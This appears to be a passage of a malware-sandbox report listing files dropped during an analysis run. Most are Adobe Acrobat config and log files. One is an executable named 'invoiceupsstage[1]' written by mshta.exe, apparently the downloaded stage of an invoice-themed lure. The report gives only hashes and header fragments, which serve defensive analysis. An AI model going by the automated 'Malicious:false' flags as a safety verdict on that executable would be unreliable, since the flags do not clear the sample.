                    SHA-512:A1C6A52328AF6DFF7C1313EA4C835C3E44E84317542B61B71DBA4FC6008E80E7A8E4753D7BBAE4608C848F3D37E374BD3B125BAEF04A5AE629E1596C1A734DE9
                    Malicious:false
                    Preview:{"analyticsData":{"responseGUID":"bfb76179-71c8-475e-babe-1ba2e58a1074","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1720096548717,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Home_LHP_Trial_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"79887_247329ActionBlock_0","campaignId":79887,"containerId":"1","controlGroupId":"","treatmentId":"acc56846-d570-4500-a26e-7f8cf2b4acad","variationId":"247329"},"containerId":1,"containerLabel":"JSON for DC_Reader_Home_LHP_Trial_Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJUcnkgQWNyb2JhdCBQcm8ifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNSIsImZvbnRfc3R5bGUiOiIwIn0sImRlc2NyaXB0aW9uX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTMiLCJmb250X3N0eWxlIjoiLTEifSwidGl0bGUiOiJGcmVlIDctZGF5IHRyaWFsIiwiZGVzY3JpcHRpb24iOiJHZXQgdW5saW1pdGVkIGFjY2VzcyB0byBwcmVtaXVtIFBERiBhbmQgZS1zaWduaW5nIHRvb2xzLiIsImJ

                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):289
                    Entropy (8bit):5.26258367632384
                    Encrypted:false
                    SSDEEP:6:YEQXJ2HXXiE9A2vB3/dVlPIHAR0YOVzAWxoAvJfYdPeUkwRe9:YvXKXv9A2vR/ZwHA/Gg8Ukee9
                    MD5:2DF2F5EF27E5CCB990B2F631C36A9A5D
                    SHA1:AB0E17F1F923490285760D5D0694480FD24E6E8D
                    SHA-256:6CEE8A056C50C278B305E0294EA27CD45AE86EE5D4A77103610501B2F9043E1D
                    SHA-512:D05421B1EE1E590F854593503C7A7D9E039D97F0FBD639B0F978CBEA5EC9AA8EFD32A937BA2CE9FB9885C649C4F263E7563D97F2E0337B1B2DD52D6644A68A0F
                    Malicious:false
                    Preview:{"analyticsData":{"responseGUID":"bfb76179-71c8-475e-babe-1ba2e58a1074","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1720096548717,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):1395
                    Entropy (8bit):5.773926556055866
                    Encrypted:false
                    SSDEEP:24:Yv6Xv9PJhWrLgEGOc93W2JeFmaR7CQzttgBcu141CjrWpHfRzVCV9FJNf:YvK9PJhWHgDv3W2aYQfgB5OUupHrQ9FX
                    MD5:167479D45C4CAD77073C99E840DB0771
                    SHA1:6785E168993A456BD59355311A16A591CB5C62D0
                    SHA-256:B3332AB19F9426FCDE4A8EE15CE5E5621C447E81D3D629476BA4CFFD02900AFC
                    SHA-512:350BA532B9810523A85AD3524CE0C81A4F68D8A3E098B6695C9E148910527D03A716EE20708CD65F8A5A5DF3A32C71C60A8C7155D93DDFC8BA6B422BB53AB26D
                    Malicious:false
                    Preview:{"analyticsData":{"responseGUID":"bfb76179-71c8-475e-babe-1ba2e58a1074","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1720096548717,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_RHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"57802_176003ActionBlock_0","campaignId":57802,"containerId":"1","controlGroupId":"","treatmentId":"d0374f2d-08b2-49b9-9500-3392758c9e2e","variationId":"176003"},"containerId":1,"containerLabel":"JSON for Reader DC RHP Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctRGF5IFRyaWFsIiwiZ29fdXJsIjoiaHR0cHM6Ly9hY3JvYmF0LmFkb2JlLmNvbS9wcm94eS9wcmljaW5nL3VzL2VuL3NpZ24tZnJlZS10cmlhbC5odG1sP3RyYWNraW5naWQ9UEMxUFFMUVQmbXY9aW4tcHJvZHVjdCZtdjI9cmVhZGVyIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTQiLCJmb250X3N0eWxlIjoiMyJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEyIiwiZm9udF9zdHlsZSI6IjMifSwidGl0

                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):291
                    Entropy (8bit):5.246387930861458
                    Encrypted:false
                    SSDEEP:6:YEQXJ2HXXiE9A2vB3/dVlPIHAR0YOVzAWxoAvJfbPtdPeUkwRe9:YvXKXv9A2vR/ZwHA/GDV8Ukee9
                    MD5:978596A3C34F6773BA9972F33602EA65
                    SHA1:66DA99A2F0CB4B9535F1B9EB1CD86D06856278C4
                    SHA-256:EF47C481FAEA8C32C5A10AE7BBF95259AE68A3443BCF1566B6D237FAA114F7B9
                    SHA-512:CA04C50FF72354A21395E4F6571892AEE230DF8FA3CF8C2796C3913FA2A7F1A0EFA8F94A955F5EEF0B567B8C90F52C03A9FB711E4CE4F17BECB62355532FA010
                    Malicious:false
                    Preview:{"analyticsData":{"responseGUID":"bfb76179-71c8-475e-babe-1ba2e58a1074","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1720096548717,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):287
                    Entropy (8bit):5.245208847894071
                    Encrypted:false
                    SSDEEP:6:YEQXJ2HXXiE9A2vB3/dVlPIHAR0YOVzAWxoAvJf21rPeUkwRe9:YvXKXv9A2vR/ZwHA/G+16Ukee9
                    MD5:71CD05E195E4AB3ADB8E90878A2F0CCF
                    SHA1:5E06B66D7AB98D8FA2D412B71190E6C33E456B8F
                    SHA-256:FC6C6CFF6093848AD44E93002DAC35F7A9517DC4C9358F6E0BADC82B41707C5D
                    SHA-512:26ED74D49337961797D2283545BA57DC8258C50A04E56B8EE2176C9B5B4B3F335BC75630D91E28A95F7789F08DCC0370FD251CE226648F26A2656C56D18E9A12
                    Malicious:false
                    Preview:{"analyticsData":{"responseGUID":"bfb76179-71c8-475e-babe-1ba2e58a1074","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1720096548717,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):289
                    Entropy (8bit):5.269696282607111
                    Encrypted:false
                    SSDEEP:6:YEQXJ2HXXiE9A2vB3/dVlPIHAR0YOVzAWxoAvJfbpatdPeUkwRe9:YvXKXv9A2vR/ZwHA/GVat8Ukee9
                    MD5:A32ED0A91100A8685D127454FDB30FB3
                    SHA1:1D7E31D9BAEE371E0298C97DA467F5F4BF04866F
                    SHA-256:886A03BB7C7B6FBD9B597F0A19BCCBF0025C383467355A98BE4F0880BF5676DE
                    SHA-512:80FBB3258297A5781C98F2CFB889B1BD0DD4FA2D04829BE38F493F258D7A397444758250C3FCDF22C767B94AED2350D5C0A179637DDC608FA7CE943F2F96DCD0
                    Malicious:false
                    Preview:{"analyticsData":{"responseGUID":"bfb76179-71c8-475e-babe-1ba2e58a1074","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1720096548717,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):286
                    Entropy (8bit):5.221957941621081
                    Encrypted:false
                    SSDEEP:6:YEQXJ2HXXiE9A2vB3/dVlPIHAR0YOVzAWxoAvJfshHHrPeUkwRe9:YvXKXv9A2vR/ZwHA/GUUUkee9
                    MD5:EF56DCF146A852D40DBEBE31997FD9CC
                    SHA1:9822858AFF91E02A6A566B7E5B4CDAE40A3E3D46
                    SHA-256:F25C3456825B6E8F0FC4A8A657B4A704A8CB4E85D20387534201A6CE84786AA5
                    SHA-512:09524E65C87CB792B54CD1F5A51F00A540EF3C35671F982A8CC9179B16A187083A9B636062DC78276FD65131308B1A2A2B5C51DCAC5FE2F0546905E81AC3E461
                    Malicious:false
                    Preview:{"analyticsData":{"responseGUID":"bfb76179-71c8-475e-babe-1ba2e58a1074","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1720096548717,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):782
                    Entropy (8bit):5.368542123438326
                    Encrypted:false
                    SSDEEP:12:YvXKXv9A2vR/ZwHA/GTq16Ukee1+3CEJ1KXd15kcyKMQo7P70c0WM6ZB/uhWIy:Yv6Xv9PJhj168CgEXX5kcIfANhC
                    MD5:6D530262715EC6273374F96BE757AA8A
                    SHA1:92DF02C19F98A04171A526427495984AA1369B44
                    SHA-256:51E4D84E3743EB38D0C03A10A0702E9B91B4E4E81A23B51E543C21633A97543C
                    SHA-512:5522FDF99CB23F3AF0B7FB6DEA346A985805EF274E802B70139FBCA40D900AFA51A43C0C331D9658754DFEBF8A5F1514C327168FCF8A31056E47119BF2826FFE
                    Malicious:false
                    Preview:{"analyticsData":{"responseGUID":"bfb76179-71c8-475e-babe-1ba2e58a1074","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1720096548717,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"Edit_InApp_Aug2020"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"20360_57769ActionBlock_0","campaignId":20360,"containerId":"1","controlGroupId":"","treatmentId":"3c07988a-9c54-409d-9d06-53885c9f21ec","variationId":"57769"},"containerId":1,"containerLabel":"JSON for switching in-app test","content":{"data":"eyJ1cHNlbGxleHBlcmltZW50Ijp7InRlc3RpZCI6IjEiLCJjb2hvcnQiOiJicm93c2VyIn19","dataType":"application\/json","encodingScheme":true},"endDTS":1735804679000,"startDTS":1719917253753}}}}

                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):4
                    Entropy (8bit):0.8112781244591328
                    Encrypted:false
                    SSDEEP:3:e:e
                    MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                    SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                    SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                    SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                    Malicious:false
                    Preview:....

                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):2814
                    Entropy (8bit):5.125920434302803
                    Encrypted:false
                    SSDEEP:24:YNMtEDzJrHhCg0LCAZMt68trDWatayDh/PT2D0loSfjzGsj0SgP2nJFoS2k662Lh:Yq8F0LC+MtDdXPzG+TFTG6se+j9PqA
                    MD5:3F46777A1149F5CE3F4C9FF9AA27625B
                    SHA1:FA236FB2C2350739B776A828D992D92B7BE514B5
                    SHA-256:1E0A076B71E7BF6127D14F898CBD3E45DB427DBEB809517491050B6BC316F128
                    SHA-512:D606F31B738512C58A587DDC6F107D38CBF9FD8CE6B5291E37901816C68C328AD0399E44607C3820DE989B3ABEC13036930BB1C4B93D82B1CCC3E08115E2988C
                    Malicious:false
                    Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"f9035d150391cfec86a38b05a5af96d9","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1719917253000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"35730978be7033865fdb2ffdb3a6541c","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":1372,"ts":1719917253000},{"id":"Edit_InApp_Aug2020","info":{"dg":"1d63afb1e69c14ea4c5731d1f0a8c94b","sid":"Edit_InApp_Aug2020"},"mimeType":"file","size":782,"ts":1719917253000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"546edb5dcd9ac4305061f3d8e88943e9","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1719917253000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"cff7d3a0a1e23af775bfea86b1e76473","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","size":289,"ts":1719917253000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"003a212a7408b0de56fb2e18c2e4e150","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":289,"ts":171991

                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                    Category:dropped
                    Size (bytes):12288
                    Entropy (8bit):1.3188888659123144
                    Encrypted:false
                    SSDEEP:24:TLKufx/XYKQvGJF7urs9Ohn07oz7oF0Hl0FopUEiP66UEiPbnPnNknNMeY/EtqVv:TGufl2GL7ms9WR1CPmPbPahYmypilI+g
                    MD5:694E688B24016449ACA742A1C884D103
                    SHA1:058B4E60BE8FA38C479B67D3363DAD60F69EAEEC
                    SHA-256:7EE3D3C333F4757F70437BAE3A816BF03EEAA80C9455651495EB4C8CAC7D4E00
                    SHA-512:774782594B88AD212CDB06771203544CF2C01F8DF5B9D3DBC852F76364F505DCD15860E2D7FCF5E9160DA3AC851E5FDF1B58B65DD13C699DE3209A1E89853A31
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:SQLite Rollback Journal
                    Category:dropped
                    Size (bytes):8720
                    Entropy (8bit):1.7803331494064196
                    Encrypted:false
                    SSDEEP:48:7MnWR1CPmPbPahYfypilIdqFl2GL7msC8:7CWfMwbPahekKVmsl
                    MD5:8B1DA192B39FCDEA43AA4DEBA0337621
                    SHA1:FB293D6475BC5DA2D87CC96CE71C188964A07712
                    SHA-256:A0C711A07AEE2563EC03E1013323A208CB0D70EAC01A47733150636BD89FD06A
                    SHA-512:89814D52FC1D3C2BF381EF3985A95CCDBFD346AB9F085617AEC596F126DF6DC7AB39594DA8430F70C82D75402C18BA2FD3DE5B48774499EC14755D7009E399A2
                    Malicious:false
                    Preview:.... .c.....=0............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................^..^.^.^.^.^.^.^.p.p.p.p.p.p.p.p.p.p..........................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\invoiceupsstage[1]

                    Download File
                    Process:C:\Windows\System32\mshta.exe
                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):200872
                    Entropy (8bit):4.619573102182415
                    Encrypted:false
                    SSDEEP:768:csfY5DRtOhVkzDOWsfY5DRtOhVkzDOsgizsfY5DRtOhVkzDOfFsfY5DRtOhVkzDO:cz+kOWz+kO/izz+kONz+kO
                    MD5:909D871CCE2252C985F9AADEDB2A754D
                    SHA1:902AF292DFB83C31BFF0F96341A24B998689B2C6
                    SHA-256:9D9CFD342000AD5655052B050ABD59AFD502E4E570335C5922DA03C117EC2749
                    SHA-512:D1C03FAEF0B83404C15D2F1580F93E3EDB8FA454D5912DDF77F8C1DDA85836E463DAA6FD30FC4200218BE39C5E702D0DB7D7BDF232F4F8BB8DB88C10D188F30F
                    Malicious:false
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............N...N...N..O...N..O...N..O...N..O...N...N...N..O...N.3N...N..O...NRich...N................PE..L...J.\-.....................~...............0....@.................................`.....@...... ...........................@..d....`..ho..........................0...T............................................@.......".......................text............................... ..`.data...|....0......................@....idata..D....@......................@..@.didat.......P......."..............@....rsrc...ho...`...p...$..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                    Download File
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):64
                    Entropy (8bit):0.34726597513537405
                    Encrypted:false
                    SSDEEP:3:Nlll:Nll
                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                    Malicious:false
                    Preview:@...e...........................................................

                    C:\Users\user\AppData\Local\Temp\MSIdcbaa.LOG

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):246
                    Entropy (8bit):3.5309417490522437
                    Encrypted:false
                    SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8gVk+g:Qw946cPbiOxDlbYnuRKLVk+g
                    MD5:F43F04525A92586BA2F1E65E1DEB9D7F
                    SHA1:37FE16B03DD5084BA24B6746E97E88B4F71E1F14
                    SHA-256:9E3A37C20E01B4800288E87CC16DA70FB06BD6BA30D4987E74366733F3AA8CD2
                    SHA-512:F1258B0BB7889D137B1BA022B8F0CD6F20C006DFF1C2A7489A6C8F7EC0677FC9EB8B863BDA4B05BDD04E51AD8DCC7446D5E7D9EA86CAC05B911E1171CDF70E22
                    Malicious:false
                    Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .0.2./.0.7./.2.0.2.4. . .0.6.:.4.7.:.3.5. .=.=.=.....

                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cykvzpzj.1pm.ps1

                    Download File
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):60
                    Entropy (8bit):4.038920595031593
                    Encrypted:false
                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                    Malicious:false
                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j3jjch04.wp5.psm1

                    Download File
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):60
                    Entropy (8bit):4.038920595031593
                    Encrypted:false
                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                    Malicious:false
                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l0fhi2pb.rt0.ps1

                    Download File
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):60
                    Entropy (8bit):4.038920595031593
                    Encrypted:false
                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                    Malicious:false
                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mbzgvsre.yfj.psm1

                    Download File
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):60
                    Entropy (8bit):4.038920595031593
                    Encrypted:false
                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                    Malicious:false
                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                    C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-07-02 06-47-28-976.log

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:ASCII text, with very long lines (393)
                    Category:dropped
                    Size (bytes):16525
                    Entropy (8bit):5.33860678500249
                    Encrypted:false
                    SSDEEP:384:IC2heaVGJMUPhP80d0Wc+9eG/CCihFomva7RVRkfKhZmWWyC7rjgNgXo6ge5iaW0:X8B
                    MD5:C3FEDB046D1699616E22C50131AAF109
                    SHA1:C9EEA5A1A16BD2CD8154E8C308C8A336E990CA8D
                    SHA-256:EA948BAC75D609B74084113392C9F0615D447B7F4AACA78D818205503EACC3FD
                    SHA-512:845CDB5166B35B39215A051144452BEF9161FFD735B3F8BD232FB9A7588BA016F7939D91B62E27D6728686DFA181EFC3F3CC9954B2EDAB7FC73FCCE850915185
                    Malicious:false
                    Preview:SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:080+0200 ThreadID=6832 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_NglAppLib Description="SetConfig:

                    C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:ASCII text, with very long lines (393), with CRLF line terminators
                    Category:dropped
                    Size (bytes):15114
                    Entropy (8bit):5.301382093997458
                    Encrypted:false
                    SSDEEP:384:srnynnxkX1Ka3VjcEqRAoLPUJfIdC2WseZ9BP3HXVqyztwz443JRexePa9qRUFNK:M3m
                    MD5:79137306F99087B025B77B9B4FF43E92
                    SHA1:21F045A14EE61B38C5B3FF8EDC12E780F95AD9B6
                    SHA-256:1D5068872582BDF0D9789DDF067097FC3511656D8E7D4230BE82BF1F7818C139
                    SHA-512:2D132A2D1A46D2F0F7BA5BF7A0E3A436765E3F5FE8FE2764C3AE02276AD397468A8F66279460765E85E90AF914F5A10098564306812983A853F4E0960F960328
                    Malicious:false
                    Preview:SessionID=843b073a-4e77-434a-b14e-18f0199b36e1.1719917249004 Timestamp=2024-07-02T06:47:29:004-0400 ThreadID=7356 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=843b073a-4e77-434a-b14e-18f0199b36e1.1719917249004 Timestamp=2024-07-02T06:47:29:005-0400 ThreadID=7356 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=843b073a-4e77-434a-b14e-18f0199b36e1.1719917249004 Timestamp=2024-07-02T06:47:29:005-0400 ThreadID=7356 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=843b073a-4e77-434a-b14e-18f0199b36e1.1719917249004 Timestamp=2024-07-02T06:47:29:005-0400 ThreadID=7356 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=843b073a-4e77-434a-b14e-18f0199b36e1.1719917249004 Timestamp=2024-07-02T06:47:29:005-0400 ThreadID=7356 Component=ngl-lib_NglAppLib Description="SetConf

                    C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):29752
                    Entropy (8bit):5.416308919421175
                    Encrypted:false
                    SSDEEP:192:TcbeIewcbVcbqI4ucbrcbQIrJcb6cbCIC4cbdbBB9+d4X+6zCO/OPhOQLQ94lcbk:ceo4+rsCt41
                    MD5:2356D077DFA9AA8845A4D2ECFE10B30B
                    SHA1:85B490A49417A5732C23A0482D41020914AAB5B0
                    SHA-256:037BB57466E1C6F759D702E7A9020D629F3EB21902A320DBF48CEB228AD7167F
